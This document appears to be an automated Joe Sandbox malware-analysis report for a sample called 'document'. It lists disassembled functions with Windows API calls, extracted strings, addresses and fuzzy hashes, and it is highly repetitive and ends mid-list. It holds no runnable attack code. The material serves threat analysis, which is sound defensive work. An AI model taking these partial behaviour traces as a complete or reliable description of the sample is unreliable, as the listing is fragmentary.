                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateEnvironmentExpandHandleReadStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 2873326616-1073058172
                                                                  • Opcode ID: c114ea442860f0f80da07236d5853267047690d1852017ad31ebe147657299ea
                                                                  • Instruction ID: c9ca788773da980f5d214099c4e0c2fa05920a1819a7867e2b669ae635df4d4e
                                                                  • Opcode Fuzzy Hash: c114ea442860f0f80da07236d5853267047690d1852017ad31ebe147657299ea
                                                                  • Instruction Fuzzy Hash: 6341142010C3C199D322DB28984874FBFD15BA6718F588A5DF1E85B2E2C3B5964DC76B
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000001), ref: 0040B868
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040B882
                                                                  • WriteFile.KERNEL32(00000000,004310B8,00000004,?,00000000), ref: 0040B899
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B8A0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateEnvironmentExpandHandleStringsWrite
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 4155862527-1073058172
                                                                  • Opcode ID: 9273c5595a96b2405ab5af5d902c7359953e1080390114a057f2b0281a9bc69d
                                                                  • Instruction ID: baa3cae5f5ab34e93cfd813ff7becf06d1d45a190b3b457302884b7f26e423b1
                                                                  • Opcode Fuzzy Hash: 9273c5595a96b2405ab5af5d902c7359953e1080390114a057f2b0281a9bc69d
                                                                  • Instruction Fuzzy Hash: E831232014D3C1D9D312D7289848B8FBFD05BA7318F488A5DF1D85A2D2C3B9824DC767
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: _strrchrlstrcmpi
                                                                  • String ID: 8$I$h$h$h$l$m$p$p$p$s$s$t$t
                                                                  • API String ID: 2999501412-836531014
                                                                  • Opcode ID: ccec61454f6af3ee337d9bff48b7e251726acd3afa5ded9e8444d64063ddd766
                                                                  • Instruction ID: 3f20e5aee60d72e1d420386b93ed5b1cec2b7467db128eb5dee041a04ac3d7e4
                                                                  • Opcode Fuzzy Hash: ccec61454f6af3ee337d9bff48b7e251726acd3afa5ded9e8444d64063ddd766
                                                                  • Instruction Fuzzy Hash: B771C07540D3C28AD326CB288040B9BFBE1ABD6204F448E6EE5D947391E7B59109CB67
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004010E1
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004010FB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040111C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateEnvironmentExpandFileHandleStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z
                                                                  • API String ID: 1403605771-759814561
                                                                  • Opcode ID: ca9cc3af777dddaed0d5913db1498ae4339569db94bec9ca99ba58dbe94e5d40
                                                                  • Instruction ID: 312b795b5e56d1041d03fccaae8dae33a3be811c4841049efce2031e4c952a66
                                                                  • Opcode Fuzzy Hash: ca9cc3af777dddaed0d5913db1498ae4339569db94bec9ca99ba58dbe94e5d40
                                                                  • Instruction Fuzzy Hash: 5B31FC2010C3C1D9E322D738985974FBFD15BA7318F588A9DF1E95B2D2C2B98249C7A7
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004017D1
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004017EB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040180C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateEnvironmentExpandFileHandleStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z
                                                                  • API String ID: 1403605771-759814561
                                                                  • Opcode ID: 913cc769b66229c6b909c85032c4fd2047f7c90766c012ad0f461adb7c7f1a52
                                                                  • Instruction ID: cf6603b6467a36f1b1fe48ee20707507a00a8aaa8c14109d76319268d20f67da
                                                                  • Opcode Fuzzy Hash: 913cc769b66229c6b909c85032c4fd2047f7c90766c012ad0f461adb7c7f1a52
                                                                  • Instruction Fuzzy Hash: 1131FC2010C3C199E322D738985874FBFD15BA7318F588A9DF1E95B2D2C2B98249C7A7
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 00401221
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040123B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401242
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateEnvironmentExpandFileHandleStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z
                                                                  • API String ID: 1403605771-759814561
                                                                  • Opcode ID: eae75d6211b48766a2a4855af57f21a379476b10d3c7f040af184a083788c328
                                                                  • Instruction ID: 183227d0d47840c6fb137b2e72691f3ad759e2d74dad290b7fbfcb0fd45e1397
                                                                  • Opcode Fuzzy Hash: eae75d6211b48766a2a4855af57f21a379476b10d3c7f040af184a083788c328
                                                                  • Instruction Fuzzy Hash: B631DC2010C3C1D9E322D738984974FBFD11BA7218F588A9DF1E95A2D2C2B99249C767
                                                                  APIs
                                                                  • GetTempPathA.KERNEL32(00000104,?,74DF0440), ref: 00419B01
                                                                  • GetTempFileNameA.KERNEL32(?,0042E290,00000000,?), ref: 00419B1B
                                                                  • WaitForSingleObject.KERNEL32(00000014,000000FF,00000000,000000EE), ref: 00419B49
                                                                  • ReleaseMutex.KERNEL32(00000014,?,?,?,00000005,?,?,?,00000006,?,?), ref: 00419FB1
                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,00000005,?,?,?,00000006,?,?), ref: 0041A0B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: FileTemp$DeleteMutexNameObjectPathReleaseSingleWait
                                                                  • String ID: %d:%d,$)$5$7$A$H$P$Z$t$u
                                                                  • API String ID: 3931662400-3265384
                                                                  • Opcode ID: fbd0aa01bd745ed4f8e17624d07f534a33e09d32544fa6f8117615c808823477
                                                                  • Instruction ID: 87167e95f2216398dbb744b78034f6cdc2098f1725ccaa65e6176ba6f2cbe2f0
                                                                  • Opcode Fuzzy Hash: fbd0aa01bd745ed4f8e17624d07f534a33e09d32544fa6f8117615c808823477
                                                                  • Instruction Fuzzy Hash: F902F2351083908FC721CF28D8A1AE7BFE0AF96314F48965DE8D5473A2D375D849CB9A
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0042A464
                                                                  • _strcat.LIBCMT ref: 0042A477
                                                                  • _strlen.LIBCMT ref: 0042A484
                                                                  • _strlen.LIBCMT ref: 0042A493
                                                                  • _strncpy.LIBCMT ref: 0042A4AA
                                                                  • _strlen.LIBCMT ref: 0042A4B3
                                                                  • _strlen.LIBCMT ref: 0042A4C0
                                                                  • _strcat.LIBCMT ref: 0042A4DE
                                                                  • _strlen.LIBCMT ref: 0042A526
                                                                  • GetStdHandle.KERNEL32(000000F4,0042EEC0,00000000,?,00000000,00000000,00000000,00000000), ref: 0042A531
                                                                  • WriteFile.KERNEL32(00000000), ref: 0042A538
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                  • API String ID: 3601721357-4022980321
                                                                  • Opcode ID: ce5f139c050410a4046e1cfe4d55637e7050fe717ca944e6fdfc0d3b7405f9c1
                                                                  • Instruction ID: 74c76adfd133b4e9a18e4e1925237b71ce4d4ae5635836e3a3127bb511270d61
                                                                  • Opcode Fuzzy Hash: ce5f139c050410a4046e1cfe4d55637e7050fe717ca944e6fdfc0d3b7405f9c1
                                                                  • Instruction Fuzzy Hash: 763128327401246BD720BBB6BC86EAB73A8EB44308F94042FFD15D3152EA7C9595C72D
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,00000104,00000104), ref: 00408348
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentExpandStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 237503144-1073058172
                                                                  • Opcode ID: 6fad4a32500c4ba3f8a82e59dce4a452e749217753927d1ac47079a33b539138
                                                                  • Instruction ID: dca6d9ca4d919790161e68c6a6737a5004210cde6544d660ad85851be413fbda
                                                                  • Opcode Fuzzy Hash: 6fad4a32500c4ba3f8a82e59dce4a452e749217753927d1ac47079a33b539138
                                                                  • Instruction Fuzzy Hash: 6C41DC1000C7C29DD312D73C955864FBFD15BE7228F488B9DF0E95B2E2D6698249C7A7
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,00000015,74DE83C0,00000000), ref: 004241EF
                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0042420C
                                                                  • RegQueryValueExA.ADVAPI32(?,ServiceName,00000000,?,?,?), ref: 00424264
                                                                  • lstrcpyA.KERNEL32(?,00000000,?,00000008), ref: 004242C0
                                                                  • RegQueryValueExA.ADVAPI32(?,Description,00000000,?,?,?), ref: 004242E8
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00424349
                                                                  • RegQueryValueExA.ADVAPI32(?,Title,00000000,?,?,?), ref: 00424378
                                                                  • wsprintfA.USER32 ref: 004243AA
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004243BD
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004243CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseOpenlstrcpy$wsprintf
                                                                  • String ID: Description$ServiceName$Title$[%d] %s
                                                                  • API String ID: 3166188874-1473919770
                                                                  • Opcode ID: 19b7f30f3d2a41f17fe764a6f9fad9a6bbe25cb027da63ad8d5f2e9f9482e0bf
                                                                  • Instruction ID: 50b48e229a94bbbaf40ab9f963702833861e6e57dc731b51fdf7295a7017bae1
                                                                  • Opcode Fuzzy Hash: 19b7f30f3d2a41f17fe764a6f9fad9a6bbe25cb027da63ad8d5f2e9f9482e0bf
                                                                  • Instruction Fuzzy Hash: 0CE123205087CEDDDF22CB7C98486CD7F955B27328F484389F9E45A2E2C3A9854AC776
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0042E7A0,00000118,0042485B,00000001,00000000,0042E4C0,00000008,0042A54F,00000000,00000000,00000000), ref: 00426582
                                                                  • _strcat.LIBCMT ref: 00426598
                                                                  • _strlen.LIBCMT ref: 004265A8
                                                                  • _strlen.LIBCMT ref: 004265B9
                                                                  • _strncpy.LIBCMT ref: 004265D3
                                                                  • _strlen.LIBCMT ref: 004265DC
                                                                  • _strcat.LIBCMT ref: 004265F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                  • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!$B
                                                                  • API String ID: 3058806289-85196374
                                                                  • Opcode ID: e85ed9134b3ae6f9a248eff3a8fb49e701f2d1d72a83a6c7e4bd4b035122a1bd
                                                                  • Instruction ID: 89b9faee52e55a897ce7ba6d50dd28e9919cf87c3f188bd51213c475bd47c2d4
                                                                  • Opcode Fuzzy Hash: e85ed9134b3ae6f9a248eff3a8fb49e701f2d1d72a83a6c7e4bd4b035122a1bd
                                                                  • Instruction Fuzzy Hash: C331C732B012347BD715ABA6BC42FDE37689F09318FD4045BF904A6282DB7CDA918B5D
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,74DF0A60,00000000,00425E71,?,0042E598,00000060), ref: 00427138
                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00427150
                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042715D
                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042716A
                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00427177
                                                                  • FlsAlloc.KERNEL32(00426FD9,?,0042E598,00000060), ref: 004271B4
                                                                  • FlsSetValue.KERNEL32(00000000,?,0042E598,00000060), ref: 004271E1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004271F5
                                                                    • Part of subcall function 00426F4B: FlsFree.KERNEL32(00000005,0042720A,?,0042E598,00000060), ref: 00426F56
                                                                    • Part of subcall function 00426F4B: DeleteCriticalSection.KERNEL32(00000000,00000000,00000000,?,0042720A,?,0042E598,00000060), ref: 0042749C
                                                                    • Part of subcall function 00426F4B: DeleteCriticalSection.KERNEL32(00000005,00000000,?,0042720A,?,0042E598,00000060), ref: 004274C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
